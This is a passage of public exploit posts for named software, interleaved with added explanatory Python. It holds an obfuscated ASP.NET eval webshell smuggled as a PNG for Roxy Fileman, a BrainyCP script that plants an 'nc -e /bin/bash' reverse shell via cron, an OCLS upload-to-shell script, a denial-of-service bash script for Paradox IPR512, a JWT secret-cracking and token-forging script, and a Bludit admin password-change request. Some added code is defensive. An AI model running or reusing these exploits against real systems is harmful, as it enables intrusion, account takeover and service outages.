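    base = os.path.basename(name.replace("\\", "/"))   # strip any directory part
    match = SAFE_NAME.fullmatch(base)
    if not match or match.group(1).lower() not in ALLOWED_EXT:
        return None
    return base


def sniff_ext(data):
    """Image type by magic bytes, or None."""
    for magic, ext in MAGIC.items():
        if data.startswith(magic):
            return ext
    return None


def validate_upload(name, data):
    """Accept only an allowlisted name whose bytes really are that image type."""
    base = safe_name(name)
    if base is None:
        return None
    declared = base.rsplit(".", 1)[1].lower()
    declared = "jpg" if declared == "jpeg" else declared
    if sniff_ext(data) != declared:
        return None
    return base


def validate_rename(old_name, new_name):
    """RENAMEFILE / MOVEFILE must apply the same allowlist as UPLOAD."""
    return safe_name(old_name) is not None and safe_name(new_name) is not None


# Constructed sample contents.
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + bytes(16)
# Shaped like the Roxy payload: 0x89 "PNG" followed by an ASP.NET JScript page, named test.jpg.
WEBSHELL_SAMPLE = b"\x89PNG\n" + b'<%@PAGE LANGUAGE=JSCRIPT %><%eval(Request["abcd"],"unsafe");%>'

if __name__ == "__main__":
    print("poc.phar, denylist:", denylist_allows("poc.phar"))                  # True (bypass)
    print("poc.phar, allowlist:", safe_name("poc.phar"))                       # None (blocked)
    print("test.jpg -> test.aspx:", validate_rename("test.jpg", "test.aspx"))  # False
    print("shell as test.jpg:", validate_upload("test.jpg", WEBSHELL_SAMPLE))  # None
    print("real png:", validate_upload("/Upload/PenTest/cat.png", PNG_SAMPLE))  # 'cat.png'
```

The magic-byte check only raises the bar (a PNG-then-script polyglot with a correct header would pass it); the controls that actually close the hole are the allowlist on every name-producing action and serving the upload directory without script execution.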
-
ever gauzy v0.281.9 - JWT weak HMAC secret
## Exploit Title: ever gauzy v0.281.9 - JWT weak HMAC secret
## Author: nu11secur1ty
## Date: 04.08.2023
## Vendor: https://gauzy.co/
## Software: https://github.com/ever-co/ever-gauzy/releases/tag/v0.281.9
## Reference: https://portswigger.net/kb/issues/00200903_jwt-weak-hmac-secret

## Description:
A JWT signed with a well-known `HMAC secret key` was detected; the key that was found is the token's signing secret. A user can observe the token while sending normal POST requests, and once he has the `Authorization: Bearer` value he can use it to authenticate and send a very malicious POST request, depending on the scenario.

STATUS:
[+]Issue: JWT weak HMAC secret
[+]Severity: High

[+]Exploit:
```http
GET /api/auth/authenticated HTTP/2
Host: apidemo.gauzy.co
Sec-Ch-Ua: "Not:A-Brand";v="99", "Chromium";v="112"
Accept: application/json, text/plain, */*
Language: en
Sec-Ch-Ua-Mobile: ?0
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.<payload>.3zm2CQ0udVj5VCBYgPPD8BzkhQ_5TgVVi91sN7eMKlw
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.gauzy.co
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.gauzy.co/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Length: 76

{
  "email":"[email protected]",
  "password": "adminrrrrrrrrrrrrrrrrrrrrrHACKED"
}
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/gauzy.co/2023/ever-gauzy-v0.281.9)

## Proof and Exploit:
[href](https://streamable.com/afsmee)

## Time spend:
03:37:00
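What "weak HMAC secret" means in practice: the header `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9` above is `{"alg":"HS256","typ":"JWT"}`, and with HS256 anyone holding the secret can mint tokens the server accepts. The following is an added example, not Gauzy's code and not using the token from the request above; it is standard library only. A JWT is built and verified by hand, a dictionary attack tries candidate secrets against the signature offline, and once the secret is recovered an ADMIN claim is signed that the server would accept. The weak secret, the wordlist and the strong 32-byte secret are constructed.

```python
"""Recovering a weak HS256 secret offline, then forging a token (added example)."""
import base64
import hashlib
import hmac
import json

# Constructed: a server that signs with a guessable secret, and one with a random 32-byte key.
WEAK_SECRET = b"secret"
STRONG_SECRET = bytes.fromhex("9f1b2c3d4e5f60718293a4b5c6d7e8f90a1b2c3d4e5f60718293a4b5c6d7e8f9")
WORDLIST = ["password", "changeme", "jwt", "secret", "supersecret"]


def _b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(claims, secret):
    """Build header.payload.signature for HS256, as a server would."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(sig)}"


def verify_hs256(token, secret):
    """Constant-time signature check; the algorithm is pinned to HS256, never read from the token."""
    header, payload, sig = token.split(".")
    if json.loads(_b64url_decode(header)).get("alg") != "HS256":
        return False
    expected = hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, _b64url_decode(sig))


def claims_of(token):
    """Decode the payload without verifying it (the attacker's view of a captured token)."""
    return json.loads(_b64url_decode(token.split(".")[1]))


def crack_secret(token, wordlist):
    """Offline dictionary attack: return the secret that reproduces the signature, or None."""
    for word in wordlist:
        if verify_hs256(token, word.encode()):
            return word.encode()
    return None


def forge(token, secret, **changes):
    """Edit the captured token's claims and re-sign them with the recovered secret."""
    claims = claims_of(token)
    claims.update(changes)
    return sign_hs256(claims, secret)


if __name__ == "__main__":
    captured = sign_hs256({"id": "u1", "role": "EMPLOYEE"}, WEAK_SECRET)
    secret = crack_secret(captured, WORDLIST)
    print("recovered secret:", secret)                                   # b'secret'
    admin = forge(captured, secret, role="ADMIN")
    print("forged token accepted:", verify_hs256(admin, WEAK_SECRET))    # True
    strong = sign_hs256({"id": "u1"}, STRONG_SECRET)
    print("strong secret cracked:", crack_secret(strong, WORDLIST))      # None
```

Nothing in the attack touches the server after the single token capture, which is why the only fix is a secret with at least as much entropy as the HMAC output (32 random bytes for HS256) or an asymmetric algorithm, plus short token lifetimes so a recovered key is worth less.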
-
Roxy Fileman 1.4.5 - Arbitrary File Upload
# Exploit Title: Roxy Fileman 1.4.5 - Arbitrary File Upload
# Date: 09/04/2023
# Exploit Author: Zer0FauLT [[email protected]]
# Vendor Homepage: roxyfileman.com
# Software Link: https://web.archive.org/web/20190317053437/http://roxyfileman.com/download.php?f=1.4.5-net
# Version: <= 1.4.5
# Tested on: Windows 10 and Windows Server 2019
# CVE : 0DAY

##########################################################################################
# First, we upload the .jpg shell file to the server.                                    #
# The file starts with the PNG magic bytes (0x89 "PNG", rendered below as "‰PNG") so it  #
# passes as an image; the rest is an ASP.NET JScript page that eval()s the value of the  #
# "abcd" request parameter (the \x-escaped strings decode to "abcd" and "unsafe").       #
##########################################################################################

POST /admin/fileman/asp_net/main.ashx?a=UPLOAD HTTP/2
Host: pentest.com
Cookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTest
Content-Length: 666
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygOxjsc2hpmwmISeJ
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://pentest.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://pentest.com/admin/fileman/index.aspx
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7

------WebKitFormBoundarygOxjsc2hpmwmISeJ
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundarygOxjsc2hpmwmISeJ
Content-Disposition: form-data; name="method"

ajax
------WebKitFormBoundarygOxjsc2hpmwmISeJ
Content-Disposition: form-data; name="d"

/Upload/PenTest
------WebKitFormBoundarygOxjsc2hpmwmISeJ
Content-Disposition: form-data; name="files[]"; filename="test.jpg"
Content-Type: image/jpeg

‰PNG
<%@PAGE LANGUAGE=JSCRIPT EnableTheming = "False" StylesheetTheme="" Theme="" %>
<%var PAY:String= Request["\x61\x62\x63\x64"];eval(PAY,"\x75\x6E\x73\x61"+ "\x66\x65");%>
------WebKitFormBoundarygOxjsc2hpmwmISeJ--

##########################################################################################
# In the second stage, we manipulate the .jpg file that we uploaded to the server.       #
# The file manager's conf.json (below) maps each UI action to a main.ashx endpoint; its  #
# FORBIDDEN_UPLOADS / ALLOWED_UPLOADS lists are the only extension restrictions in it.    #
##########################################################################################

{
  "FILES_ROOT": "",
  "RETURN_URL_PREFIX": "",
  "SESSION_PATH_KEY": "",
  "THUMBS_VIEW_WIDTH": "140",
  "THUMBS_VIEW_HEIGHT": "120",
  "PREVIEW_THUMB_WIDTH": "300",
  "PREVIEW_THUMB_HEIGHT": "200",
  "MAX_IMAGE_WIDTH": "1000",
  "MAX_IMAGE_HEIGHT": "1000",
  "INTEGRATION": "ckeditor",
  "DIRLIST": "asp_net/main.ashx?a=DIRLIST",
  "CREATEDIR": "asp_net/main.ashx?a=CREATEDIR",
  "DELETEDIR": "asp_net/main.ashx?a=DELETEDIR",
  "MOVEDIR": "asp_net/main.ashx?a=MOVEDIR",
  "COPYDIR": "asp_net/main.ashx?a=COPYDIR",
  "RENAMEDIR": "asp_net/main.ashx?a=RENAMEDIR",
  "FILESLIST": "asp_net/main.ashx?a=FILESLIST",
  "UPLOAD": "asp_net/main.ashx?a=UPLOAD",
  "DOWNLOAD": "asp_net/main.ashx?a=DOWNLOAD",
  "DOWNLOADDIR": "asp_net/main.ashx?a=DOWNLOADDIR",
  "DELETEFILE": "asp_net/main.ashx?a=DELETEFILE",
  "MOVEFILE": "asp_net/main.ashx?a=MOVEFILE",
  "COPYFILE": "asp_net/main.ashx?a=COPYFILE",
  "RENAMEFILE": "asp_net/main.ashx?a=RENAMEFILE",
  "GENERATETHUMB": "asp_net/main.ashx?a=GENERATETHUMB",
  "DEFAULTVIEW": "list",
  "FORBIDDEN_UPLOADS": "zip js jsp jsb mhtml mht xhtml xht php phtml php3 php4 php5 phps shtml jhtml pl sh py cgi exe application gadget hta cpl msc jar vb jse ws wsf wsc wsh ps1 ps2 psc1 psc2 msh msh1 msh2 inf reg scf msp scr dll msi vbs bat com pif cmd vxd cpl htpasswd htaccess",
  "ALLOWED_UPLOADS": "bmp gif png jpg jpeg",
  "FILEPERMISSIONS": "0644",
  "DIRPERMISSIONS": "0755",
  "LANG": "auto",
  "DATEFORMAT": "dd/MM/yyyy HH:mm",
  "OPEN_LAST_DIR": "yes"
}

############################################################################################################################################################################################################################
# We trigger "rename" in the file manager and send the RENAMEFILE request with n=test.aspx. Alternatively, the "asp_net/main.ashx?a=RENAMEFILE" entry in conf.json is swapped for "asp_net/main.ashx?a=MOVEFILE", so the   #
# same UI action issues a MOVEFILE request whose destination path on the server we control, as shown below. Neither action rejects the .aspx name, so the uploaded .jpg becomes an executable page.                        #
############################################################################################################################################################################################################################

POST /admin/fileman/asp_net/main.ashx?a=RENAMEFILE&f=%2FUpload%2FPenTest%2Ftest.jpg&n=test.aspx HTTP/2
Host: pentest.com
Cookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTest
Content-Length: 44
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://pentest.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://pentest.com/admin/fileman/index.aspx
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7

f=%2FUpload%2FPenTest%2Ftest.jpg&n=test.aspx

===========================================================================================================================================================================================================================

POST /admin/fileman/asp_net/main.ashx?a=MOVEFILE&f=%2FUpload%2FPenTest%2Ftest.jpg&n=%2FUpload%2FNewFolder%2Ftest.aspx HTTP/2
Host: pentest.com
Cookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTest
Content-Length: 68
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://pentest.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://pentest.com/admin/fileman/index.aspx
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7

f=%2FUpload%2FPenTest%2Ftest.jpg&n=%2FUpload%2FNewFolder%2Ftest.aspx

##########################################################################################
# and it's done!                                                                         #
##########################################################################################

HTTP/2 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/10.0
X-Aspnet-Version: 4.0.30319
X-Powered-By-Plesk: PleskWin
Date: Sun, 09 Apr 2023 09:49:34 GMT
Content-Length: 21

{"res":"ok","msg":""}

=============================================================================================
-
Paradox Security Systems IPR512 - Denial Of Service
#!/bin/bash
# Exploit Title: Paradox Security Systems IPR512 - Denial Of Service
# Google Dork: intitle:"ipr512 * - login screen"
# Date: 09-APR-2023
# Exploit Author: Giorgi Dograshvili
# Vendor Homepage: https://www.paradox.com/Products/default.asp?PID=423
# Version: IPR512
# CVE : CVE-2023-24709

# Function to display banner message
display_banner() {
    echo "******************************************************"
    echo "*                                                    *"
    echo "*                PoC CVE-2023-24709                  *"
    echo "*     BE AWARE!!! RUNNING THE SCRIPT WILL MAKE       *"
    echo "*   A DAMAGING IMPACT ON THE SERVICE FUNCTIONING!    *"
    echo "*                by SlashXzerozero                   *"
    echo "*                                                    *"
    echo "******************************************************"
}

# Call the function to display the banner
display_banner
echo ""
echo ""

echo "Please enter a domain name or IP address with or without port"
read -p "(e.g. example.net or 192.168.12.34, or 192.168.56.78:999): " domain

# Step 2: Ask for user confirmation
read -p "This will DAMAGE the service. Do you still want it to proceed? (Y/n): " confirm

if [[ $confirm == "Y" || $confirm == "y" ]]; then
    # Display loading animation (cycle through the four frames)
    animation=("|" "/" "-" "\\")
    index=0
    while [[ $index -lt 10 ]]; do
        echo -ne "Loading ${animation[index % 4]} \r"
        sleep 1
        index=$((index + 1))
    done

    # Use curl to send HTTP GET request with custom headers and timeout.
    # log_user carries a URL-encoded "</script>", which breaks the login page.
    response=$(curl -i -s -k -X GET \
        -H "Host: $domain" \
        -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36" \
        -H "Accept: */*" \
        -H "Referer: http://$domain/login.html" \
        -H "Accept-Encoding: gzip, deflate" \
        -H "Accept-Language: en-US,en;q=0.9" \
        -H "Connection: close" \
        --max-time 10 \
        "http://$domain/login.cgi?log_user=%3c%2f%73%63%72%69%70%74%3e&log_passmd5=&r=3982")

    # Check response for HTTP status code 200 and print result
    if [[ $response == *"HTTP/1.1 200 OK"* ]]; then
        echo -e "\nIt seems to be vulnerable! Please check the webpanel: http://$domain/login.html"
    else
        echo -e "\nShouldn't be vulnerable! Please check the webpanel: http://$domain/login.html"
    fi
else
    echo "The script is stopped!."
fi
-
BrainyCP V1.0 - Remote Code Execution
# Exploit Title: BrainyCP V1.0 - Remote Code Execution
# Date: 2023-04-03
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://brainycp.io
# Demo: https://demo.brainycp.io
# Tested on: Kali Linux
# CVE : N/A

import sys
import requests

# credentials (a valid panel login is required; the code runs as that user's cron job)
url = input("URL: ")
username = input("Username: ")
password = input("Password: ")
ip = input("IP: ")
port = input("Port: ")

# login
session = requests.Session()
login_url = f"{url}/auth.php"
login_data = {"login": username, "password": password, "lan": "/"}
response = session.post(login_url, data=login_data)
if "Sign In" in response.text:
    print("[-] Wrong credentials or may the system patched.")
    sys.exit()

# reverse shell
reverse_shell = f"nc {ip} {port} -e /bin/bash"

# request: add an every-minute cron entry whose command is the reverse shell
add_cron_url = f"{url}/index.php?do=crontab&subdo=ajax&subaction=addcron"
add_cron_data = {
    "cron_freq_minutes": "*",
    "cron_freq_minutes_own": "",
    "cron_freq_hours": "*",
    "cron_freq_hours_own": "",
    "cron_freq_days": "*",
    "cron_freq_days_own": "",
    "cron_freq_months": "*",
    "cron_freq_weekdays": "*",
    "cron_command": reverse_shell,
    "cron_user": username,
}
response = session.post(add_cron_url, data=add_cron_data)
print("[+] Check your listener!")
-
Online Computer and Laptop Store 1.0 - Remote Code Execution (RCE)
#!/usr/bin/env python3
# Exploit Title: Online Computer and Laptop Store 1.0 - Remote Code Execution (RCE)
# Date: 09/04/2023
# Exploit Author: Matisse Beckandt (Backendt)
# Vendor Homepage: https://www.sourcecodester.com/php/16397/online-computer-and-laptop-store-using-php-and-mysql-source-code-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-ocls.zip
# Version: 1.0
# Tested on: Debian 11.6
# CVE : CVE-2023-1826
# Exploit Description : The application does not sanitize the 'img' parameter when sending data to '/classes/SystemSettings.php?f=update_settings'. An attacker can exploit this issue by uploading a PHP file and accessing it, leading to Remote Code Execution.

import sys
import requests
from argparse import ArgumentParser
from uuid import uuid4
from datetime import datetime, timezone


def interactiveShell(fileUrl: str):
    print("Entering pseudo-shell. Type 'exit' to quit")
    while True:
        command = input("\n$ ")
        if command == "exit":
            break
        response = requests.get(f"{fileUrl}?cmd={command}")
        print(response.text)


def uploadFile(url: str, filename: str, content):
    # No session is needed for this endpoint.
    endpoint = f"{url}/classes/SystemSettings.php?f=update_settings"
    file = {"img": (filename, content)}
    response = requests.post(endpoint, files=file)
    return response


def getUploadedFileUrl(url: str, filename: str):
    # The application stores the upload under /uploads/ as <unix time of the current minute>_<original name>.
    timeNow = datetime.now(timezone.utc).replace(second=0)  # UTC time, rounded down to the minute
    epoch = int(timeNow.timestamp())  # Unix time in seconds
    possibleFilename = f"{epoch}_{filename}"
    fileUrl = f"{url}/uploads/{possibleFilename}"
    response = requests.get(fileUrl)
    if response.status_code == 200:
        return fileUrl
    return None


def exploit(url: str):
    filename = str(uuid4()) + ".php"
    content = "<?php system($_GET['cmd'])?>"
    response = uploadFile(url, filename, content)
    if response.status_code != 200:
        print(f"[File Upload] Got status code {response.status_code}. Expected 200.")

    uploadedUrl = getUploadedFileUrl(url, filename)
    if uploadedUrl is None:
        print("Error. Could not find the uploaded file.")
        sys.exit(1)
    print(f"Uploaded file is at {uploadedUrl}")

    try:
        interactiveShell(uploadedUrl)
    except KeyboardInterrupt:
        pass
    print("\nQuitting.")


def getWebsiteURL(url: str):
    if not url.startswith("http"):
        url = "http://" + url
    if url.endswith("/"):
        url = url[:-1]
    return url


def main():
    parser = ArgumentParser(description="Exploit for CVE-2023-1826")
    parser.add_argument("url", type=str, help="The url to the application's installation. Example: http://mysite:8080/php-ocls/")
    args = parser.parse_args()
    url = getWebsiteURL(args.url)
    exploit(url)


if __name__ == "__main__":
    main()
-
Microsoft Edge (Chromium-based) Webview2 1.0.1661.34 - Spoofing
## Title: Microsoft-Edge-(Chromium-based)-Webview2-1.0.1661.34-Spoofing-Vulnerability
## Author: nu11secur1ty
## Date: 04.10.2023
## Vendor: https://developer.microsoft.com/en-us/
## Software: https://developer.microsoft.com/en-us/microsoft-edge/webview2/
## Reference: https://www.rapid7.com/fundamentals/spoofing-attacks/
## CVE ID: CVE-2023-24892

## Description:
The Webview2 development platform is vulnerable to spoofing attacks. The attacker can build a very malicious web app and spread it to the victim's networks, and when they open it, this can be the last web app they ever open.

STATUS: HIGH Vulnerability

[+]Exploit:
[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-24892/PoC)

## Reproduce:
[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-24892)

## Proof and Exploit:
[href](https://streamable.com/uk7l2n)

## Time spent: 03:00:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
nu11secur1ty <http://nu11secur1ty.com/>
-
Bludit 4.0.0-rc-2 - Account takeover
## Exploit Title: Bludit 4.0.0-rc-2 - Account takeover
## Author: nu11secur1ty
## Date: 04.11.2013
## Vendor: https://www.bludit.com/
## Software: https://github.com/bludit/bludit/releases/tag/4.0.0-rc-2
## Reference: https://www.cloudflare.com/learning/access-management/account-takeover/
## Reference: https://portswigger.net/daily-swig/facebook-account-takeover-researcher-scoops-40k-bug-bounty-for-chained-exploit

## Description:
An already authenticated attacker can send a normal request to change his own password, then reuse the same JSON `object` and the vulnerable `API token KEY` in the same request to change the admin account password. He can then log in to the admin account and do very malicious stuff.

STATUS: HIGH Vulnerability

[+]Exploit:

```http
PUT /api/users/admin HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 138
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36
content-type: application/json
Accept: */*
Origin: http://127.0.0.1:8000
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8000/admin/edit-user/pwned
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: BLUDIT-KEY=98t31p2g0i7t6rscufuccpthui
Connection: close

{"token":"4f8df9f64e84fa4562ec3a604bf7985c","authentication":"6d1a5510a53f9d89325b0cd56a2855a9","username":"pwned","password":"password1"}
```

[+]Response:

```http
HTTP/1.1 200 OK
Host: 127.0.0.1:8000
Date: Tue, 11 Apr 2023 08:33:51 GMT
Connection: close
X-Powered-By: PHP/7.4.30
Access-Control-Allow-Origin: *
Content-Type: application/json

{"status":"0","message":"User edited.","data":{"key":"admin"}}
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/bludit/2023/Bludit-v4.0.0-Release-candidate-2)

## Proof and Exploit:
[href](https://streamable.com/w3aa4d)

## Time spent: 00:57:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
nu11secur1ty <http://nu11secur1ty.com/>
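A minimal model of the `PUT /api/users/<key>` handler described above, added here as an example (not Bludit's code): the vulnerable shape edits whatever record the URL names once the caller holds a valid API token and authentication token, and the fixed shape adds the object-level check. The user table, tokens and roles are constructed in memory; only the JSON body mirrors the post.

```python
import hmac
import json

# Site-wide API token and the per-user authentication token, as in the post's JSON body.
API_TOKEN = "4f8df9f64e84fa4562ec3a604bf7985c"
AUTH_TOKENS = {"6d1a5510a53f9d89325b0cd56a2855a9": "pwned"}   # authentication -> user key


def make_users() -> dict:
    """Fresh in-memory user table (constructed for the example) so each run starts clean."""
    return {
        "admin": {"role": "admin", "password": "original-admin-pw"},
        "pwned": {"role": "author", "password": "original-pwned-pw"},
    }


def _authenticate(body: dict):
    """Shared by both handlers: the API token must match and the per-user token
    must belong to a known account. Returns the caller's user key, else None."""
    if not hmac.compare_digest(body.get("token", ""), API_TOKEN):
        return None
    return AUTH_TOKENS.get(body.get("authentication", ""))


def vulnerable_edit_user(users: dict, target_key: str, raw_body: str) -> dict:
    """Shape of the bug in the post: once the caller is authenticated, the record
    named in the URL (/api/users/<target_key>) is edited, whoever owns it. The
    'username' in the body is never compared with the URL or with the caller."""
    body = json.loads(raw_body)
    if _authenticate(body) is None or target_key not in users:
        return {"status": "1", "message": "Unauthorized"}
    users[target_key]["password"] = body["password"]
    return {"status": "0", "message": "User edited.", "data": {"key": target_key}}


def fixed_edit_user(users: dict, target_key: str, raw_body: str) -> dict:
    """Object-level authorisation: identity comes from the authentication token,
    not from the body; a non-admin may edit only their own record and may never
    change a role."""
    body = json.loads(raw_body)
    caller = _authenticate(body)
    if caller is None or caller not in users:
        return {"status": "1", "message": "Unauthorized"}
    if target_key not in users:
        return {"status": "1", "message": "Unknown user"}
    caller_is_admin = users[caller]["role"] == "admin"
    if target_key != caller and not caller_is_admin:
        return {"status": "1", "message": "Forbidden"}
    if "role" in body and not caller_is_admin:
        return {"status": "1", "message": "Forbidden"}
    users[target_key]["password"] = body["password"]
    if "role" in body:
        users[target_key]["role"] = body["role"]
    return {"status": "0", "message": "User edited.", "data": {"key": target_key}}


# The body from the post: a valid 'pwned' session replayed against /api/users/admin.
ATTACK_BODY = json.dumps({
    "token": API_TOKEN,
    "authentication": "6d1a5510a53f9d89325b0cd56a2855a9",
    "username": "pwned",
    "password": "password1",
})
```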
-
Google Chrome Browser 111.0.5563.64 - AXPlatformNodeCocoa Fatal OOM/Crash (macOS)
## Exploit Title: Google Chrome Browser 111.0.5563.64 - AXPlatformNodeCocoa Fatal OOM/Crash (macOS)
## Exploit Author: LiquidWorm

Vendor: Google LLC
Product web page: https://www.google.com
Affected version: 111.0.5563.64 (Official Build) (x86_64)
                  110.0.5481.100 (Official Build) (x86_64)
                  108.0.5359.124 (Official Build) (x86_64)
                  108.0.5359.98 (Official Build) (x86_64)
Fixed version:    112.0.5615.49 (Official Build) (x86_64)

Summary: Google Chrome browser is a free web browser used for accessing the internet and running web-based applications. The Google Chrome browser is based on the open source Chromium web browser project. Google released Chrome in 2008 and issues several updates a year.

Desc: Fatal OOM/crash of Chrome browser while detaching/attaching tabs on macOS.

Commit fix: "The original cl landed many months ago, but chrome/browser/ui/views/frame/browser_non_client_frame_view_mac.mm is the only change that didn't revert cleanly."

macOS a11y: Implement accessibilityHitTest for remote app shims (PWAs)

Implements accessibility hit testing for RemoteCocoa so that Hover Text and VoiceOver mouse mode can read the accessible objects under the user's pointer. Cross-process plumbing was needed because RemoteCocoa bridges to native controls in a separate app shim process and must report accessibility trees from the browser process via the undocumented NSAccessibilityRemoteUIElement mechanism.

This CL does the following:

1. Unblocks remote accessibilityHitTest by calling setRemoteUIApp:YES in the browser process. This enables the browser process to accept redirected accessibilityHitTest calls to the object corresponding to any NSAccessibilityRemoteUIElement returned by the original accessibilityHitTest at the app shim process.

2. (For Browser UI) Overrides NativeWidgetMacNSWindowTitledFrame's accessibilityHitTest to have a custom implementation with NSAccessibilityRemoteUIElement support so that custom window controls can be found. Additionally, adjusts the BrowserView bounds so that AXPlatformNodeCocoa's accessibilityHitTest (which doesn't support view targeting) can return controls in the web app frame toolbar.

3. (For Web Content) Implements RenderWidgetHostViewCocoa's accessibilityHitTest for instances in the app shim to return a NSAccessibilityRemoteUIElement corresponding to their counterparts in the browser process so that web content objects can be found.

Tested on: macOS 12.6.1 (Monterey)
           macOS 13.3.1 (Ventura)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2023-5770
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5770.php

08.12.2022

--

UI PoC:
-------

1. Grab a tab and detach it.
2. Bring back the tab.
3. Do this 2-3 times attaching / re-attaching the tab.
4. Chrome will hang (100% CPU) / Out-of-Memory (OOM) for 7-8 minutes.
5. Process crashes entirely.

Ref: Issue 1400682 (Ticket created: Dec 13, 2022)
Ref: https://bugs.chromium.org/p/chromium/issues/detail?id=1400682
Ref: https://chromium-review.googlesource.com/c/chromium/src/+/3861171
Ref: axtester.mm terminal PoC by [email protected] (https://bugs.chromium.org/u/161486905)

=============

```cpp
//
// Copyright (c) Microsoft Corporation. All rights reserved.
//
#include <ApplicationServices/ApplicationServices.h>
#include <unistd.h>  // isatty(), STDOUT_FILENO
#include <iostream>
#include <sstream>
#include <vector>

__BEGIN_DECLS
// NOLINTNEXTLINE
AXError _AXUIElementGetWindow(AXUIElementRef, CGWindowID *);
// NOLINTNEXTLINE
CFTypeID AXTextMarkerGetTypeID();
__END_DECLS

std::ostream& bold_on(std::ostream& os) {
